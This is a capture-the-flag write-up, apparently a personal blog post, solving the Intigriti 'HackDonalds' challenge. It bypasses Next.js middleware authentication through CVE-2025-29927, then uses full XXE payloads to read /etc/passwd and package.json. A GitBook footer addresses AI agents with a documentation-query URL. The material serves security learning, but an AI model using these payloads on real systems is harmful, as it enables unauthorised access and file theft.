# HackDonalds Intigriti CTF

Challenge: <https://app.intigriti.com/programs/intigriti/challenge-hackdonalds/detail>

Target: <https://hackdonalds.intigriti.io/>

## Enumeration

The web application is pretty small so the culprit can be spotted I assume pretty easily.

We see a menu, a home page, and a login/admin page.

When attempting to login the request is as follows:

<figure><img src="/files/nrrYJ0R9cleHlLaMSoi8" alt=""><figcaption></figcaption></figure>

Other requests look like this:

<figure><img src="/files/ad1jjDrKGFY09oemOBIJ" alt=""><figcaption></figcaption></figure>

I thought of LFI due to how the images are generated, but decided to first google the components and the endpoints first and foremost.

We know it is a next.js application based on the "X-Powered-By" header.

<figure><img src="/files/jg8qE1IfNDQGXo9hGCOU" alt=""><figcaption></figcaption></figure>

We also see a request to an "admin.json" endpoint.

<figure><img src="/files/Klk4z5WrNCWiNxj26Qd9" alt=""><figcaption></figcaption></figure>

If we try to access "/admin" endpoint directly, it redirects us to "/login".

So we should google the URL components and see whether this is a common thing.

<figure><img src="/files/w9jC2hcydhMsd1vbUfMd" alt=""><figcaption></figcaption></figure>

And uh, it's pretty much pointless, I read things, but nothing helped.&#x20;

Well okay, let's look for a new term, we know we're trying to access the "admin.json" endpoint, but the application is redirecting us towards the "/login" page due to insufficient permissions.

<figure><img src="/files/4FgaBoNMShKPVgKCk4DN" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.reddit.com/r/nextjs/comments/1ji1j4j/nextjs_middleware_authentication_bypass/>" %}

{% embed url="<https://www.neoxs.me/blog/critical-nextjs-middleware-vulnerability-cve-2025-29927-authentication-bypass>" %}

## Exploitation

We just follow the instructions, get ModHeader (or we can do this through Burp with match and replace, but this is also an easy way).

We just need step 5 to execute the concept, everything else is for knowledge sake.

{% embed url="<https://www.neoxs.me/blog/critical-nextjs-middleware-vulnerability-cve-2025-29927-authentication-bypass#step-5-bypassing-authentication->" %}

And we add the header.

<figure><img src="/files/JvvyGR6tsYBID9zrs8rm" alt=""><figcaption></figcaption></figure>

Do a request to /admin and now we have access ^^.

<figure><img src="/files/0HmhEP7DWc1tjvvoAlTK" alt=""><figcaption></figcaption></figure>

The only endpoint that exists is "/ice-cream-machines" all the others are fluff.

<figure><img src="/files/eLXQCAjkES7pvFOp1D2k" alt=""><figcaption></figcaption></figure>

When you open their settings you see an XML parser and machine settings.

<figure><img src="/files/NgTibUjYvnq79iDFUGcl" alt=""><figcaption></figcaption></figure>

Now all we need is to read up on XXE.

{% embed url="<https://portswigger.net/web-security/xxe>" %}

When clicking on parse settings the following happens:

<figure><img src="/files/unnYB1jS4WTqbbamcy3t" alt=""><figcaption></figcaption></figure>

We need the following payload from the Burp explanation.

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

We ofcourse change foo to machine and just add \&xxe; to the \<name> parameter instead.

So our payload will look like this:

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

And the output will look like this:

<figure><img src="/files/dtbUolW7SPKZMssT85v2" alt=""><figcaption></figcaption></figure>

Okay, now we need to find the flag, this is just enumeration at this point and attempting to seek out important endpoints. The flag is located in package.json, so we can just extract it with the following payload:

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [ <!ENTITY xxe SYSTEM "package.json"> ]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

<figure><img src="/files/LIm2Rl3tUFnZ2jf2D02R" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://minatours-notes.gitbook.io/blog/ctfs/hackdonalds-intigriti-ctf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.